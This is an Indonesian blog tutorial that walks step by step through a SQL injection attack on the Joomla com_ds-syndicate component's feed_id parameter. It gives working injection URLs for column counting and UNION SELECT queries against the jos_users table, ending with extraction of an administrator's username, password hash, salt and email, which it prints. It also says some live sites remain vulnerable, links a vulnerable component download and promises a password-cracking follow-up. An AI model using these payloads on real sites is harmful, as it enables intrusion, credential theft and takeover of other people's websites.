bermodalkan internet dan browser internet tentunya, dan sedikit
pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang
manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan
data.

Ya, belum lama ini, salah satu component joomla terbukti
mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh
tubuh, dan berakibat kematian pada akhirnya. ~~

Telah
ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah
satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla.
Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan
filtering sql yang ketat dalam variable feed_id. Penyusupan dapat
dilakukan, sederhananya ini terjadi karena kesalahan dari variable
feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki
kecacatan seperti ini.

Ya, Langsung aja …

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1

Url
ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes
kelemahannya, dengan penambahan tanda kutip ( ‘ ) di belakangnya.

http:// korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1′

Apa yang terjadi ? … error…

Langkah
selanjutnya adalah cari urutan si table ‘dssyndicate_feeds’ dengan
mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan
error yang berbeda :

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/*    –>    errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/*    –>    errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/*    –>    errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/*    –>    errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/*    –>    errornya sama
…
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/*    –>    errornya berbeda

perhatikan
bentuk error-nya berbeda ketika feed_id yang diisi dengan
1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang
selanjutnya.

Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.

Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+jos_users

lihat paling akhir dari baris tersebut,
from+jos_users

jos_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.

Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,

Setelah
itu buka file yang baru didownload tersebut dengan editor seperti
notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk
membukanya dengan notepad, tidak dengan browser internet, karena
memudahkan untuk pembacaan hasil dari sql injection yang telah
dilakukan.

Lihat angka 2 di dalam tag : </p> <p><title>2 (18)

Jangan
pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah
angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan
browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan
selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain
untuk menggunakannya seperti melihat versi mysql yang digunakan, ya
langsung saja, kita akan mencobanya untuk melihat versi mysql yang
digunakan oleh si korban. Gunakan url ini …

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+jos_users

perhatikan
angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali
file telah di download dengan notepad, apa yang terjadi ? title berubah
menjadi versi si mysql, yang penulis dapatkan :

5.0.33 (18)

Mysql
versi 5.0.33 , sampai sini anda telah dapat eksplorasi database user
dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya,
mendapatkan username dan password si admin. .

Pengambilan
username dan password secara paksa menggunakan sql injection ini dapat
dilakukan secara satu persatu, ataupun sekaligus. Query untuk
menampilkan username menggunakan bug sql injection yang satu ini, anda
cukup mengganti @@version yang tadi dengan field yang menyimpan
informasi username tentunya, gunakan url ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut …

admin (18)

Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :

http://korban.com/hack/joomla/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users

perhatikan,
string username, diganti dengan
concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan
concat disini adalah mengconvert suatu hexa, ataupun spesial karakter
kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :

0x3a
berubah menjadi titik dua ( : ), buka kembali file hasil dari url di
atas. Yang penulis dapatkan adalah informasi seperti ini :

admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK:alkemail@gmail.com:Super Administrator

Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : alkemail@gmail.com
User type : Super Administrator

Yang
di lakukan selanjutnya adalah mencoba crack password, karena itu masih
dalam bentuk hash, dengan kata lain password yang masih terenkripsi.

. Yups, pengambilan username dan password secara paksa telah terjadi,
si attacker kembali mencari cara bagaimana mendapatkan password yang
asli, dengan cara mengcrack password hash tersebut.

Inilah
bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari
seorang admin yang malas melakukan patch pada systemnya.

Di
artikel selanjutnya penulis akan menjalankan konsep sederhana password
crack untuk joomla menggunakan php. Tunggu kelanjutannya … .

Untuk keperluan eksperimen, silahkan download filenya di sini.
http://joomlacode.org/gf/download/frsrelease/6828/22538/Joomla_1.0.15-Stable-Full_Package.zip
http://networkandgame.890m.com/ilmuwebsite/hack/joomla/com_ds-syndicate.tar.gz

greetz : b_scorpio bisnis semen, staff ilmuwebsite yang pada ngurus skripsinya
Peterpanz
yang kerepotan ngurus skripsi juga , mr.freeman, for jojo too,